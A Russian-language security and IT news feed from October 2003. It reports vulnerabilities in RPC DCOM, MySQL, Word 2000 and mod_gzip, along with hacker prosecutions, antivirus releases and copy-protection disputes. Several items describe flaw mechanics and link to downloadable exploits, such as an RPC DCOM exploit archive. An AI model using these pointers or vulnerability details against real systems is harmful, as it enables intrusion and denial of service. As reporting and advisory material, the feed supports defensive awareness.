Компания Microsoft готовит к выходу технологию Wireless Provisioning Services (WPS), призванную сделать работу в беспроводных локальных сетях более простой и безопасной. При этом выгоду должны ощутить как простые пользователи, так и операторы сетей связи. WPS будет состоять из двух частей: серверной и клиентской. Серверная компонента технологии будет реализована в первом сервис-паке для Windows Server 2003, который будет выпущен в первом квартале 2004 года. Клиентская часть WPS будет выпущена в виде загружаемого обновления к Windows XP в конце нынешнего года. Источник - http://www.compulenta.ru
13/10/2003 17:13 В США поймали хакера за финансовые махинации.
Девятнадцатилетнему хакеру из Финиксвилля, штат Пенсильвания, предъявлено обвинение в мошенничестве. Как сообщает агентство Reuters, он сумел взломать одну из учётных записей брокерской конторы TD Waterhouse. Взломщик получил доступ к учётной записи неназванного жителя Бостона. Раздобытые данные мошенник тут же использовал для покупки пут-опционов (контракты на продажу ценных бумаг) на обыкновенные акции компании Cisco Systems. Затем он собирался продать эти опционы. Опционы дают право их держателю продать или купить ценные бумаги, такие как акции или облигации, по заранее установленной цене в определенный день. Хакер решил продать опционы, потому что цена акций компании Cisco Systems оказалась выше цены по опциону. Используя свою собственную учётную запись, он разместил заявки на продажу своих опционов, и одновременно - на покупку 7200 опционов Cisco, но уже с учётной записи своей жертвы. В итоге, он воспользовался 47 тысячами долларов с чужого счета и сэкономил 37 тысяч долларов на своих опционах. Подробности - http://story.news.yahoo.com/news?tmpl=story&...
13/10/2003 17:01 Уязвимость в SpamAssasin.
Как сообщает cybervlad на bugtraq.ru, любопытная особенность обнаружилась в версиях SpamAssassin до 2.6 (программа для борьбы со спамом). Если он встречал в письме нечто похожее на цифровую подпись, письмо признавалось "однозначно НЕ-спамом". Видимо, разработчики исходили из посыла, что ставить под письмом цифровую подпись будет только совсем больной на голову спамер. Обнаруженной особенностью незамедлительно воспользовались профессиональные спамеры, посему крайне рекомендуется апгрейд SpamAssassin до версии 2.6. Подробности - http://news.zdnet.co.uk/communications/...
13/10/2003 16:37 Недельный отчет о вирусах Panda Software.
Вышел очередной еженедельный отчёт о вирусах Panda Software. В нём рассматриваются: три троянца - IRCBot.D, Ruledor.A и Pup.A, червь Gaobot.S и две новых версии Gibe.C. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=200
13/10/2003 16:14 Совместный проект Panda Software и Agnitum Ltd.
Два ведущих разработчика в области программ по защите компьютеров, испанская компания Panda Software и российская Agnitum Ltd., объединили усилия, чтобы предоставить пользователям пакет своих программ: Panda Antivirus Titanium и Outpost Personal Firewall Pro. Outpost Firewall Pro будет обеспечивать защиту и контроль данных, попадающих и покидающих систему пользователя, а Panda Antivirus Titanium – «патрулировать» внутренний периметр, обнаруживая и уничтожая вирусы. Работая в паре, антивирус и персональный брандмауэр избавят пользователя от головной боли, связанной с защитой его компьютера. Panda Antivirus Titanium и Outpost Firewall Pro являются признанными законодателями мод в области компьютерной безопасности. Высокий уровень их разработок был высоко оценен ведущими западными и отечественными экспертами. Совместную работу Panda Antivirus Titanium и Outpost Personal Firewall Pro можно сравнить с тем как пограничные войска (Outpost) контролируют границы государства, а силы правопорядка (Panda) – обеспечивают безопасность внутри страны. На продажу новый пакет выставлен в Интернет-магазине Softkey (http://www.softkey.ru/). Покупая пакет, пользователь сэкономит 20% от цены каждой программы. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=199
13/10/2003 16:00 Электронный журнал "Спамтест" No. 19.
На сайте "Лаборатории Касперского" выложен очередной (19-й) выпуск электронного журнала "Спамтест". В номере: Новости, Инструкция по привлечении спамеров к ответственности по закону, Ответы на вопросы читателей, Анонсы. Подробнее - http://www.kaspersky.ru/news.html?id=143536082
13/10/2003 15:57 Производитель ПО не решился судить студента за взлом защиты CD от пиратского копирования.
Компания SunnComm Technologies отказалась от своего намерения подать иск против американского студента, опубликовавшего способ преодоления разработанной ей новой защиты от копирования CD, сообщает сайт BBC News. Обучающийся по специальности "компьютерные технологии" Джон Халдерман (John Halderman) обнаружил, что произведенная SunnComm программа MediaMax CD-3 становится полностью бессильной, если при вставленном диске нажать и удерживать клавишу Shift. Программа записана на защищенном музыкальном диске и предназначена для защиты от копирования музыки при работе в операционной системе Windows. Если, работая в этой системе, вставить в CD-привод диск и удерживать при этом клавишу Shift, то это заблокирует функцию автозапуска диска (autorun) и, соответственно, не даст имеющейся там программе провести самоинсталляцию. Таким образом защищен вышедший в сентябре диск "Comin' From Where I'm From" исполнителя Энтони Гамильтона (Anthony Hamilton). После того, как Джон Халдерман оповестил о своей находке интернет-общественность, SunnComm заявила, что собирается судиться с ним. Но после того, как эта информация получила огласку, компания отменила свое решение, заявив, что не хочет препятствовать научной деятельности. Подробности - http://news.bbc.co.uk/2/hi/technology/3186592.stm
12/10/2003 18:22 Cтатья "Сервер с нуля на FreeBSD 4.x
На сайте vlankas.ru опубликована довольно интересная и полезная статья, в которой рассказывается, как установить Ос FreeBSD версии 4.х c ноля. Разделы статьи: 1.Установка FreeBSD; 1.1. Установка Midnight Commander (сокращённо MC); 1.2. Конфигурация и компиляция нового ядра; 1.3. Настройка конфигурационных файлов; 2.Установка и настройка SQUID + SquidGuard; 3.Установка, настройка, тестирование MySQL; 4.Установка PHP4; 5.Установка WEB сервера Apaсhe; 6.Установка WEB портала на основе NUKE 6.8 RUS. Как пишет сам автор (Косырев В.М.) "Все настройки данной системы, именно той конфигурации, о которой пойдет речь я изучил примерно за 2-3 недели, и то не напрягаясь, т.е. помимо этого занимаясь свой обычной работой. Данная статья писалась из расчёта, вдруг я через полгода или год забуду чё делал и опираясь на ниже изложенное быстро всё поставил на место". Думается, статья будет небезынтересна и начинающим СИСАДМИНам, работающим в Linux. Cтатья - http://www.vlankas.ru/freebsd/index.html
12/10/2003 17:15 Выход Mozilla Firebird 0.6.1.
Прямо перед выходов новой версии - 0.7, вышел релиз Mozilla Firebird 0.6.1. Firebird - Вэб-браузер, который пришёл на смену Phoenix. Основан на технологии Mozilla. Как известно, помимо монолитного браузера Mozilla, компания также выпускает как отдельный продукт браузер, получивший название Firebird и почтовый клиент, называющийся Thunderbird (на настоящий момент выпущена версия 0.2). Подробности - http://www.mozilla.org/products/firebird/
12/10/2003 17:04 Windows - лучшее алиби для хакера.
В США тинэйджер, которого обвиняют в проведении хакерской атаки, заявляет, что это сделал не он, а другой, настоящий хакер, который удаленно взял под контроль его компьютер и попросту его "подставил". Цепочка его защиты беспрекословна и заслуживает всяческой похвалы: "Моя операционная система поддерживает удаленное администрирование. На тот момент патч был недоступен и мой компьютер, из-за дыры в Windows, мог контролировать кто угодно," заявляет Аарон Кафри. Если Аарона оправдают, то будет создан весьма неприятный для американского правосудия прецедент, когда хакеру для оправдания будет достаточно доказать, что его компьютер в момент совершения преступления, мог быть в свою очередь также взломан со стороны. С другой стороны, это настолько реально, что Аарон действительно может быть невиновен. Судьи пока не знают, как им вести себя в такой ситуации и тянут дело до тех пор, пока не найдут разумный компромисс. Источник - http://www.crime-research.ru
12/10/2003 16:08 Эксплоит уязвимости в RPC DCOM.
Похоже, уязвимость в DCOM RPC не даёт покоя многим программистам и специалистов по безопасности - опубликован ещё один, очередной эксплоит, который сваливает XP/2K/2003 cо всем установленными патчами (в т.ч. MS03-39). Авторы - karlss0n и ЗАРАЗА, соответственно, сам эксплоит выложен на нижегородском сайте ЗАРАЗы. Эксплоит - http://www.security.nnov.ru/files/rpc3.zip
12/10/2003 15:45 Сетевой маршрутизатор на Linux.
На сайте IBM опубликована статья, рассказывающая как построить свой сетевой маршрутизатор на ОС Linux при помощи опенсорс ПО для TCP/IP маршрутизации - Zebra - достойной альтернативы маршрутизаторам Cisco. В статье приводятся примеры настройки и установки: MRLG - Multi-Router Looking Glass, веб-интерфейс для Zebra; RIP; OSPF. Cтатья - http://www-106.ibm.com/developerworks/library/l-emu/?ca=dnt-440
12/10/2003 15:39 Уязвимость в MySQL.
Обнаружена уязвимость в популярной в мире открытых систем СУБД MySQL. Поле password в user table имеет длину 16 символов, при этом проверка длины вводимого пароля не производится. Пароли с длиной > 16 символов вызовут переподнение буфера. Атакующий, имеющий право модификации user table, может выполнить произвольный код с правами MySQL пользователя. Подробности - http://www.securityfocus.com/archive/1/340786/2003-10-07/2003-10-13/0
12/10/2003 15:27 Телефоны Nokia продолжают взрываться.
На минувшей неделе в Нидерландах произошел несчастный случай с владельцем сотового телефона фирмы Nokia. По данным Reuters пятнадцатилетний житель города Хенгело (Hengelo) получил ожог ноги из-за взрыва телефона фирмы Nokia. Издание CNET News.com со ссылкой на организацию по защите прав потребителей Consumentenbond уточняет, что пострадавший подросток работал в супермаркете, а телефон в момент взрыва находился в кармане его брюк. По словам представителя Consumentenbond, взорвалась одна из относительно новых моделей телефонов, хотя точная информация по этому поводу отсутствует. Ранее сообщалось о самопроизвольном воспламенении телефона Nokia у 33-летней жительница Амстердама, которая также получила ожоги. По информации Reuters, еще один несчастный случай с продукцией Nokia имел место во Вьетнаме, где ожоги получила молодая женщина. По заявлениям представителей Nokia, во всех без исключения несчастных случаев виноваты аккумуляторные батареи от сторонник производителей, которые владельцы телефонов устанавливали самостоятельно. Подробности - http://news.com.com/2100-1039_3-5088434.html
12/10/2003 14:23 Деградирующие игры - кошмарный сон пиратов.
Авторы новой системы борьбы с игровым пиратством - корпорация Macrovision, занимающаяся вопросами цифрового авторского права, и известный разработчик компьютерных игр, компания Codemasters. Определение легальной копии по заранее нанесенным царапинам на CD или DVD-дисках - далеко не основная особенность системы. Такой способ ранее уже использовался в этой области. Примечательно другое: даже если программа и определит нелегальную копию защищенного приложения, оно все равно запустится. Но процесс игры на таком диске при этом станет непредсказуемым - автомобили начнут тормозить, оружие будет стрелять совсем не туда, куда было нацелено, а футбольный мяч "случайно" улетать в небо. И чем дальше, тем подобных "сюрпризов" будет больше. Наверное, именно поэтому технология получила название Fade - что в переводе на русский язык переводится как "угасание". Сами же разработчики предпочитают использовать слово "деградация". Сарказм новой системы защиты в том, что к тому моменту, когда из-за этих неожиданностей играть становится невозможно, несчастный владелец пиратской копии успевает довольно сильно увлечься процессом Подробности - http://news.bbc.co.uk/hi/russian/sci/tech/newsid_3181000/3181232.stm
12/10/2003 14:16 Cisco повышает безопасность беспроводных сетей.
Представители Cisco Systems объявили о планах усиления защиты системы аутентификации пользователей беспроводных сетей в связи с появившимися сообщениями о свободном распространении инструментария, предоставляющего возможность создавать "взламывающее" ПО. В начале августа специалисты Cisco впервые объявили о том, что алгоритм широко используемого протокола Lightweight Extensible Authentication Protocol (LEAP) уязвим перед атаками, направленными на раскрытие паролей пользователей: появилось сообщение на Web-сайте, и коммерческому персоналу было дано указание об информировании пользователей. Подобные атаки способны определить пароль в течение нескольких минут, заваливая систему огромным количеством слов и чисел. Применение паролей с увеличенным количеством символов и нечетной суммой используемых букв и цифр значительно повышает их безопасность. Такие рекомендации для формирования "сильных" паролей были даны ИТ-менеджерам специалистами Cisco 7 августа. В настоящее время предлагается возможность перехода от протокола LEAP к использующему одноразовые пароли и цифровые сертификаты протоколу Protected Extensible Authentication Protocol. Источник - http://www.osp.ru
11/10/2003 11:37 Исправление для кумулятивного патча к Internet Explorer 6.
Компания Microsoft выпустила обновление для браузера Internet Explorer с установленным Service Pack 1 и кумулятивным патчем, описанным в бюллетене безопасности MS03-032. Обновление устраняет ошибку в обработке скриптов на языке JavaScript, приводившее к отказу браузера отображать, открываемые скриптами страницы. Из-за изменений, внесенных в обработку JavaScript, при использовании в коде скрипта относительных ссылок браузер выдавал ошибку HTTP 404, так как не мог найти нужный файл. Выпущенное Microsoft обновление предназначено для пользователей, который по каким-то причинам не могут установить более новый кумулятивный патч, описанный в бюллетене MS-03-040. Помимо ликвидации новых критических дыр в этом патче исправлены и проблемы с JavaScript. Подробности - http://www.compulenta.ru/2003/10/10/42516/
11/10/2003 10:53 Утилита для удаления RPC DCOM из ОС Windows.
На сайте Gibson Research Corporation обнаружена довольно интересная (и в свете последних новостей - довольно актуальная) утилита для удаления RPC DCOM из ОС Windows. Называется утилита довольно забавно - "DCOMbobulator". Помимо удаления этого сервиса утилита также проверяет саму уязвимость. Весит всего 29 килобайт. Также на приведенной ниже странице рассказывается о том, что такое DCOM и насколько она необходима "счастливым" пользователям ОС WinXP, 2K. Страница проекта - http://grc.com/dcom/
11/10/2003 10:37 Уязвимость RPC DCOM N2 так и не устранена!
Как сообщается на securitylab.ru, после тщательной проверки, сразу из нескольких источников стало известно, что “универсальный ”эксплоит против DCOM№2 уязвимости (мы давали на него ссылку ранее) работает даже при установленной заплате MS03-39. Пока удалось настроить эксплоит только для DoS нападения, но скорее всего эксплоит можно оптимизировать и для выполнения произвольного кода. Всем пользователям срочно рекомендуется закрыть уязвимые порты для доступа из интернет, так как в ближайшее время возможно появление нового разрушительного червя, эксплуатирующего неустраненную уязвимость. Об этом одновременно заявили VigilantMinds Inc. и ЗАРАЗА. Уязвимость проверена на ОС: Microsoft Windows XP Professional, Microsoft Windows XP Home, Microsoft Windows 2000 Workstation. Подробности - http://www.securitylab.ru/40754.html
11/10/2003 10:09 Австралия на пару дней осталась без электронной почты.
Почти 3 млн. австралийских пользователей интернета испытывали проблемы с электронной почтой на текущей неделе из-за неполадок, возникших в сетях трех крупнейших интернет-провайдеров страны - BigPond, OptusNet и OzEmail. В результате модернизации серверного ПО неправильно функционировала система обеспечения коммутируемого и широкополосного доступа компании BigPond, в итоге компания приняла решение вернуться к старой версии программного обеспечения. Сеть провайдера OptusNet была перегружена большим трафиком спама, в результате чего доставка электронной почты значительно замедлилась. А компания OzEmail боролась с DоS-атакой на свой SMTP-сервер. Представители всех компаний сообшили, что в настоящий момент проблемы в их сетях ликвидированы и начиная с сегодняшнего дня восстановлен нормальный трафик электронной почты. Источник - http://www.cnews.ru
11/10/2003 10:03 Переполнение буфера в Microsoft Office 2000.
Наш соотечественник под ником SpAmC0der //PRiZM cообщает об обнаружении им уязвимости в популярном офисном пакете Microsoft Office 2000. При обработке документа Microsoft Word, содержащего макросы, может произойти переполнение буфера в стеке. Анализ недокументированной структуры макроса в документе, осуществляемый процессом winword.exe, выполняется некорректно. Эта структура в частности содержит полные внешнее и внутреннее имена макроса в формате UNICODE. Общеизвестно, что первые два байта любой строки UNICODE содержат ее длину. В коде winword.exe не содержится проверки на максимальный размер этих строк, хотя в стеке под подобную строку winword.exe выделяет 512 байт (это соответствует 256 символам UNICODE). Затронутые продукты: Microsoft Word 97, Microsoft Word 2000 SR-1. В Microsoft Word XP этот баг пофиксен. Подробности и эксплоит - http://www.security.nnov.ru/search/document.asp?docid=5232
10/10/2003 15:35 Доступ к Microsoft Windows Server 2003 Shell Folders через символы обхода каталога.
Уязвимость обнаружена в Microsoft Windows Server 2003. Удаленный пользователь может сослаться на различные файлы относительно "Shell Folders" на целевой системе. Эта проблема может облегчить эксплуатацию других уязвимостей. Удаленный пользователь может сформировать HTML, который может сослаться на различные "shell folders" на системе используя '..\' символы обхода каталога в комбинации с 'shell:' URL. Удаленный пользователь не должен знать или предполагать имя учетной записи целевого пользователя, чтобы получить доступ к этим директориям. Shell папки включают стандартные каталоги Windows, типа "My Documents", "Recent", "Start Menu", "Temporary Internet Files" и другие. Способов устранения обнаруженной уязвимости не существует в настоящее время. Согласно сообщению, исправление будет включено в следующий пакет исправлений для Microsoft Windows Server 2003. Подробности - http://www.securitylab.ru/40752.html
10/10/2003 15:01 Эффективный почтовый фильтр для Linux.
Sendmail Confirmation System (SMC) - программное приложение разработанное, чтобы значительно уменьшить сумму приходящей SPAM/UCE почты. SMC это Фильтр (plugin) для программы Sendmail, который блокирует нежелательную почту на этапе приема. SMC реализует два типа динамических локальных "белых списков" (для известных/надежных отправителей), поддерживает "DNS черные списки" (для нежелательных отправителей), и автоматическую систему подтверждения доставки (для неизвестных, но легальных отправителей). SMC также имеет набор дополнительных важных функций, позволяющих предохранить получателей почты от опасных типов присоедененных файлов и HTML вложений. Также SMC может проверять входящую почту на наличие вирусов, используя антивирус Касперского TM. SMC фильтр был разработан для ОС Linux. Поддержка других операционных систем планируется. Информация получена с linux.org.ru. Подробности - http://smc.iszf.irk.ru/
10/10/2003 14:23 Нажмете клавишу Shift и попадете в тюрьму?
Компания SunnComm Technologies отреагировала на открытие Джона Холдермана (John Halderman). Напомним, что студент Принстона опубликовал на своем сайте способ обойти защиту от копирования музыкальных дисков на Windows-системах при помощи нажатия клавиши Shift. Вместо того чтобы использовать эту информацию для доработки программного обеспечения, SunnComm Technologies подала иск против Холдермана. В своем заявлении компания называет сообщение Холдермана ложным и вредящим репутации компании. Также в иске фигурирует обвинение в нарушении Digital Millennium Copyright Act (DMCA) вторым из описанных методов обхода защиты дисков: при помощи удаления файлов, которые MediaMax инсталлирует в систему. SunnComm утверждает, что, во-первых, автор сообщения признавался, что удалял драйвер MediaMax, чтобы сделать копию диска, и, во-вторых, своим сообщением облегчил незаконное копирование другим пользователям, помогая им также нарушить DMCA. Источник - http://arstechnica.com
10/10/2003 14:09 Microsoft меняет тактику защиты систем.
Выступая на всемирной партнерской конференции Microsoft в Новом Орлеане, исполнительный директор Microsoft Стив Баллмер (Steve Ballmer) в общих чертах рассказал о ряде новых инициатив и инвестиционных проектов корпорации, цель которых – поддержать репутацию компании, уже изрядно подмоченную в глазах общественности, в вопросах, касающихся информационной безопасности. По словам Стива Баллмера, новые инициативы помогут справиться с растущим числом угроз, встающих перед пользователями ПК. Одно из основных направлений, над которым будет усиленно работать Microsoft, – этот усовершенствование процесса установки «заплаток» для программных продуктов. Стив Баллмер ознакомил присутствующих с новой схемой выпуска обновлений и поправок: теперь они будут выпускаться каждый месяц. По словам CEO Microsoft, это снизит нагрузку, лежащую на плечах системных администраторов, обеспечивая их более высоким уровнем предсказуемости и облегчая управление ИТ-инфраструктурой. Microsoft также представил улучшенную систему защиты для операционных систем Windows XP и Windows Server 2003. Усовершенствования для Windows XP будут включены в пакет обновлений Service Pack 2. Они касаются защиты от хакерских атак на незащищенные порты, через электронную почту, программы-трояны и уязвимости, связанные с ошибкой переполнения буфера. Изменения, внесенные в Windows Server 2003, позволят осуществлять проверку пользователя при удаленном соединении и при вхождении во внутрикорпоративную сеть. Это позволит защитить корпоративные сети от вирусов, приносимых туда с мобильных систем. Усовершенствованная система защиты Windows Server 2003 будет выпущена во второй половине 2004 года. Источник - http://www.cnews.ru/newtop/index.shtml?2003/10/10/149874
10/10/2003 13:26 Торвальдс начинает замораживать следующую версию Linux .
В среду Торвалдс выпустил версию ядра 2.6.0-test7, сообщив, что теперь он вместе с ответственным за версию 2.6 Эндрю Мортоном ориентирует программистов не просто на «вылизывание» кода, а на работу над уменьшением вероятности сбоев. «Мы с Эндрю стараемся охладить пыл разработчиков, и мне больше не нужны поправки, не устраняющие реальных и явных ошибок, — говорится в заявлении Торвальдса. — Иными словами, до конца октября мы должны оценить состояние 2.6.0, отбросив всяческие помехи, связанные с „не абсолютно необходимыми” вещами». Некоторые серьезно отнеслись к новому приоритету. В четверг Грег Кроа-Хартман, возглавляющий работу над USB (universal serial bus) в Linux, сказал программистам, что ему придется отложить устранение ошибки в коде поддержки устройства инфракрасной связи для программируемых игрушек Lego. Подробности - http://zdnet.com.com/2100-1104_2-5089006.html
10/10/2003 13:08 Sun выпустит модификацию ОС Solaris для процессоров Opteron.
Компания Sun Microsystems намерена выпустить новую версию своей операционной системы Solaris, в которой будет реализована полноценная поддержка новых процессоров компании AMD, использующих расширенный набор 64-разрядных команд. Об этом рассказал на встрече с журналистами руководитель софтверного подразделения компании Джонатан Шварц. В настоящее время Sun достаточно активно продвигает версию Solaris для 32-разрядных процессоров архитектуры x86, которая также может работать на процессорах Opteron. Однако поддержка дополнительных 64-разрядных команд позволяет значительно повысить производительность системы. По словам Шварца, тестовая версия Solaris для серверов на Opteron будет выпущена в первом квартале 2004 года. Окончательный вариант системы увидит свет несколько позднее, но в течение 2004 года. В настоящее время поддержка 64-разрядного режима новых процессоров AMD имеется только в SuSE Linux. В ближайшее время должен выйти дистрибутив Red Hat Linux с поддержкой новых процессоров, а соответствующая версия Windows появится в 2004 году. Источник - http://www.compulenta.ru
10/10/2003 12:49 Новая система защиты от нелегального копирования.
Как сообщает еженедельник New Scientist, издатели компьютерных игр взяли на вооружение еще одно программное средство для борьбы с пиратами, подделывающими программное обеспечение. В разработанной новой защите от копирования предусмотрено некоторое новшество: пиратская продукция после установки на компьютер пользователя первое время функционирует нормально, но со времени начинает давать сбои. По мнению разработчиков, с ростом количества возникающих при работе программы ошибок пиратская копия становится настолько раздражающей для пользователя, что он вследствие уже появившегося у него интереса к новой игре пойдет и купит легальную копию. Такой метод, получивший от своих разработчиков название Fade, был изобретен совместными усилиями английских и калифорнийских программистов - компаниями Codemasters и Santa Clara. Метод основан на принципе работы системы коррекции ошибок, которую используют приводы CD-ROM и DVD для распознавания поцарапанных дисков. Программное обеспечение, защищенное по методу Fade, содержит так называемый "подрывной" кусок программного кода, который разработан с целью имитации царапин на диске. Такие "ошибки" на диске имеют определенное сочетание, соответствующее уникальной копии легального владельца игры. Подробности - http://story.news.yahoo.com/news?tmpl=story&ncid=1209&e=5...
10/10/2003 12:18 Выход Panda Titanium Antivirus 2004.
Panda Software выпускает на рынок Titanium Antivirus 2004. Это мощное антивирусное решение рассчитано и на домашних пользователей, и на частных предпринимателей, и на профессионалов. Программа, защищающая компьютеры от вредоносных кодов любых типов, является результатом постоянного развития широко известного в мире продукта Panda Antivirus Titanium. Так же, как и ее предшественница, Titanium Antivirus 2004 – это программа, работающая по принципу “установил и забыл”. Простота использования по-прежнему сочетается с высокой надежностью работы. Программа предлагает превентивную защиту от всех типов вирусов. В то же время при создании этой программы компания Panda Software отказалась от устаревшей концепции ограничения проблемы ИТ безопасности исключительно антивирусной защитой. Panda Titanium Antivirus 2004 умеет защищать не только от вирусов, сетевых червей и троянов, но и других неприятностей, проникающих в компьютеры пользователей через Интернет, - спама, атак хакеров, программ-шпионов, «дозвонщиков» и т.п. Подробности - http://www.viruslab.ru
10/10/2003 11:56 Недовольный бейсбольный фанат организовал спамерскую атаку на спортивные издания.
Агенты ФБР арестовали 39-летнего калифорнийца Аллана Эрика Карлсона, обвиняемого в совершении 79 преступлений в сфере компьютерной безопасности, сообщает сайт газеты The Philadelphia Inquirer. Среди инкриминируемых Карлсону деяний - незаконный доступ к компьютерам пользователей, хищение их идентификационных данных и организация спамерской атаки. С ноября 2001 года по декабрь 2002 года обвиняемый получал контроль над чужими компьютерами и использовал их для спамовой рассылки по электронным адресам сотрудников изданий The Philadelphia Inquirer, Philadelphia Daily News и сайта бейсбольной команды Philadelphia Phillies. В отправленных Карлсоном письмах содержались негативные отзывы о руководстве Philadelphia Phillies, страстным фанатом которой он является. Согласно тексту обвинительного заключения ряд адресов, по которым отсылал свои письма Карлсон, оказались нерабочими. В этих случаях уведомления о невозможности доставить сообщение поступали пользователям, чьи компьютеры преступник использовал в своих целях. В результате, за небольшой промежуток времени произошло резкое увеличение почтового трафика. По совокупности всех предъявленных обвинений Карлсон может быть приговорен к 471 году лишения свободы и штрафу в размере $117250000. Источник - http://www.viruslist.ru
9/10/2003 18:36 Уязвимости в mod_gzip.
Zone-H Security Team cообщает о выпуске патча к модулю Вэб-сервера Apache - mod_gzip. Этот модуль предназначен для ускорения передачи Вэб-контента путём сжатия данных при доставке клиенту. Matthew Murphy обнаружил в этом модуле 3 уязвимости: первая связана с переполнением стека в механизме ведения статистики (logging) при передаче в качестве аргумента длиннного имени файла (с возможностью выполнения произвольного кода в системе), вторая - с уязвимостью формата строки при выполнении специально сформированного запроса HTTP GET в том же самом механизме, третья - небезопасная работа с символическими ссылками временных файлов, в результате чего могут быть переписаны важные системные файлы. Подробное описание - http://www.zone-h.org/en/advisories/read/id=3225/
9/10/2003 18:04 FAQ по червям.
Stuart Staniford, президент компании Silicon Defense выложил в Интернете статью, которая, фактически, представляет собой FAQ, посвящённый описанию технологии работы и распространения червей. Основной упор сделан именно на сетевые черви - их отличие от вирусов, техника заражения и распространения. Также описаны наиболее известные на настоящий момент сетевые черви - Code Red, Nimda, Slammer, Blaster (и, естественно, не обойдён вниманием самый первый сетевой червь Морриса). FAQ - http://www.networm.org/faq/
9/10/2003 17:26 Apple анонсирует новую серверную ОС.
Как сообщается на www.sysadmins.ru, компания Apple анонсирует выпуск своей новой операционной системы Mac OS X Server 10.3 (Panther) с более чем 150-ю новыми возможностями. Дата выхода системы назначена на 24 октября. Mac OS X Server 10.3 будет включать Samba3, новый почтовый сервер, основанный на Postfix и Cyrus, а также VPN-сервер, поддерживающий клиентов MAC, Windows и Unix. Также будет включен в поставку и Apache. Стоимость Panther Server 10.3 колеблется в пределах от $449 (версия на 10 клиентов) до $999 (анлимитед-версия). Подробности - http://story.news.yahoo.com/news?tmpl=story&...
9/10/2003 17:15 Microsoft правит бал на рынке серверных ОС.
Несмотря на растущую конкуренцию со стороны Linux, Microsoft продолжает доминировать на рынке серверных операционных систем, утверждает аналитическая фирма IDC. Софтверный гигант сохранит свои лидирующие позиции на мировом рынке серверного системного ПО по крайней мере до 2007 года, говорится в опубликованном в среду отчете IDC. В продолжение этого периода объемы поставок Microsoft Windows и Linux будут расти, так что рынок серверных ОС в целом будет расширяться на 9,1% в год. Для сравнения, темпы роста рынка клиентских операционных систем прогнозируются на уровне 7,5% в год. Несмотря на заключение IDC, что 2002 год стал критическим по общим затратам на ИТ, объемы продаж операционных систем и связанных с ними подсистем продемонстрировали некоторые признаки восстановления, увеличившись на 4,3% до 18,6 млрд долл. Лидером роста стала Windows (12,4%). Все прочие продукты, кроме операционных систем Microsoft и Linux-систем, показали в прошлом году отрицательную динамику. Из 5,7 млн новых лицензий на серверные ОС, проданных в прошлом году, 99% были лицензиями на системы Windows, Linux, Unix (11%) и NetWare (9,9%). В клиентском секторе на долю Windows, Linux и Apple Mac OS (2,9%) пришлось 99,5% из общего объема продаж в 121 млн единиц. Источник - http://www.zdnet.ru
9/10/2003 17:09 Банковское объединение Absa вновь подверглось хакерской атаке.
"Объединенные банки Южной Африки" (Absa) подверглись новой хакерской атаке, сообщает сайт издания Mail & Guardian со ссылкой на телеканал SABC. Полиция и представители Absa проводят расследование по факту заявлений одного из клиентов, сообщившего о пропаже со своего банковского счета 52 тыс. рандов. Пострадавший клиент не пользуется банковскими интернет-услугами, однако 52 тыс. рандов пропали с его счета именно через интернет. За два дня мая средства обворованного вкладчика были задействованы для оплаты десяти разных сделок. Потерпевший работал ранее в правительственных структурах и сообщил, что украденные деньги были частью его пенсионных выплат. Два дня назад по решению суда под залог был освобожден Йоханнес Якобус Фурье, обвиняемый в хищении со счетов Absa 500 тысяч рандов. Источник - http://www.viruslist.com
9/10/2003 17:01 Опубликован очередной список самых опасных программ.
В среду организация по компьютерной безопасности опубликовала четвертый ежегодный рейтинг уязвимости программного обеспечения, предупредив системных администраторов, что им следует срочно проверить свои системы. Список Top 20 Vulnerabilities, публикуемый институтом SysAdmin Audit Network Security (SANS), впервые был подготовлен три года назад совместно с Центром защиты национальной инфраструктуры ФБР. Он состоит из двух частей: десятки самых опасных пробелов в защите операционной системы и ПО Microsoft и десятки наиболее опасных пробелов в защите Unix-систем. Самой уязвимой из Windows-систем SANS считает Internet Information Service (IIS). В прошлом году Microsoft выпустила предупреждения о полудюжине с лишним пробелов в защите веб-сервера IIS. В мае компания предупредила заказчиков сразу о четырех ошибках в этом ПО, а в ноябре специалисты сообщили софтверному гиганту о новых уязвимостях веб-сервера. Червь Code Red, широко распространившийся в июле и августе 2001 года, использовал для проникновения в инфицируемые машины веб-серверы Microsoft. Среди Unix-систем наиболее проблематичной программой названа система управления именами доменов (DNS) Berkeley Internet Name Domain (BIND). Она широко применяется для управления базами данных, в которых имена доменов ставятся в соответствие числовым адресам. В прошлом году было обнаружено несколько ошибок в ПО BIND. В марте организация Internet Software Consortium выпустила новую, исправленную версию программы, а в ноябре специалисты нашли новую, неустраненную ошибку. Подробности - http://isc.sans.org/top20.html#threats
9/10/2003 16:47 Британская полиция предупреждает о расцвете организованной преступности в Сети.
Правоохранительные органы многих стран продолжают выражать серьезную озабоченность в связи с ростом числа интернет-преступлений. При этом, если раньше мошенничеством и взломами в Сети занимались небольшие группы или одиночки, то теперь можно говорить о приходе в интернет самой настоящей организованной преступности. Именно так считает Лен Хиндс, глава британского Национального управления по преступлениям в сфере высоких технологий (NHTCU). О своем видении проблемы Хиндс рассказал в интервью агентству Reuters. По мнению руководителя NHTCU наиболее уязвимыми перед интернет-преступниками являются индивидуальные пользователи интернета, компьютеры которых, как правило менее защищены, а сами пользователи зачастую слишком доверчивы. Хиндс назвал несколько основных сфер, в которых работают организованные преступные группировки в интернете. Во-первых, это различные формы финансового мошенничества и воровство номеров кредитных карт. Наиболее распространенным является сценарий с созданием фальшивых сайтов известных финансовых организаций. Злоумышленники заманивают на них доверчивых пользователей и просят указать реквизиты кредитных карт или банковских счетов. За нынешний год NHTCU зафиксировало 40 случаев подделки сайтов британских финансовых организаций. Годом ранее таких случаев было всего семь. Более подробно - http://www.compulenta.ru/2003/10/9/42470/
9/10/2003 16:31 Патч для Internet Explorer в Windows Server 2003.
Компания Microsoft выпустила обновление для браузера Internet Explorer, поставляемого в комплекте с ОС Windows Server 2003. От всех других версий IE вариант для Windows Server 2003 отличается включенным по умолчанию режимом повышенной безопасности, позволяющим блокировать многие атаки, опасные для других версий Windows. Однако в реализации этого режима имеется недоработка, приводящая к тому, что данные о работе браузера в разных зонах безопасности записываются неверно. В частности, при записи в журнал не делается различий между сайтами, к которым применяется режим повышенной безопасности, и доверенными узлами, страницы которых отображаются без ограничений. Это значительно осложняет анализ журналов работы браузера. Патч - http://www.microsoft.com/downloads/details.aspx?...
9/10/2003 16:05 Ещё один эксплоит уязвимости в RPC DCOM.
